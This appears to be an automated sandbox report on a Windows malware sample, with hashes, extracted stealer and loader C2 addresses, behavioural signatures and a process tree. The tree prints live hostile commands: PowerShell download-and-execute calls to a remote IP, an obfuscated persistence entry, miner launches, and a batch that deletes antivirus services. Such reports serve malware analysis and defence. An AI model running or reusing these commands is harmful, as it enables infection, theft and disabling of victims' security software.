Overview

overview

10

Static

static

6c0aa25e7a...52.exe

windows7_x64

10

6c0aa25e7a...52.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-08-2021 00:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6c0aa25e7a4fe66a0cd648fcd8728b52.exe

  • Size

    319KB

  • MD5

    6c0aa25e7a4fe66a0cd648fcd8728b52

  • SHA1

    88bca55f776aaf296e629adac6b5789b7935aa11

  • SHA256

    008e443855d5e3c364f847c31e513bb48589e1cdf1a3bc622367f64062258e8e

  • SHA512

    36143c741fdae41ef4652e76ee449f01beef47abecdee979ca7205bc392644b571abea30479c80d3fbf4c9740b5865314196dbb59688b0a9182db709a7897cbd

Score
10/10
raccoonredlinesmokeloader2ca2376c561d1af7f8b9e6f3256b06220a3db187471c70de3b4f9e4d493e418d1f60a90659057de0@gasfer_darkcd8dc1031358b1aec55cc6bc447df1018b068607backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

@gasfer_dark

C2

207.154.240.76:80

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon Stealer Payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 56 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe
    "C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe
      "C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2400
  • C:\Users\Admin\AppData\Local\Temp\7CC7.exe
    C:\Users\Admin\AppData\Local\Temp\7CC7.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp" /SL5="$6002E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Users\Admin\AppData\Local\Temp\7CC7.exe
        "C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp" /SL5="$80062,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
            "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:3588
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4640
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4700
            • C:\ProgramData\Data\install.exe
              "C:\ProgramData\Data\install.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4740
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in System32 directory
                • Drops file in Program Files directory
                PID:4784
                • C:\Windows\SysWOW64\WimBootCompress\WerFault.exe
                  "C:\Windows\SysWOW64\WimBootCompress\WerFault.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:4124
            • C:\ProgramData\Systemd\HostData.exe
              NULL
              6⤵
              • Executes dropped EXE
              PID:4792
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4816
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4888
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4940
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:5076
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2608
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:5116
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4168
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4320
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1800
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4460
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1068
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4204
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3676
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4416
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2032
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3152
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2092
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1112
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4604
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:1516
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1124
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2044
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1108
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4696
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4444
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4752
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4916
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4904
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:3412
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4088
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1196
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1820
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2792
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:1800
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2188
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:5060
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4148
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4204
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:408
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4372
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4432
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2932
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:468
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4008
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:2092
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:3752
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4668
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks whether UAC is enabled
              PID:2784
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:1516
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2672
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4672
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4684
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4588
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
                PID:4664
    • C:\Users\Admin\AppData\Local\Temp\8563.exe
      C:\Users\Admin\AppData\Local\Temp\8563.exe
      1⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:572
    • C:\Users\Admin\AppData\Local\Temp\898B.exe
      C:\Users\Admin\AppData\Local\Temp\898B.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\ProgramData\Runtimebroker.exe
        "C:\ProgramData\Runtimebroker.exe"
        2⤵
        • Executes dropped EXE
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
          3⤵
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
          3⤵
          • Blocklisted process makes network request
          PID:1108
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell" Get-MpPreference -verbose
            4⤵
              PID:1776
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f 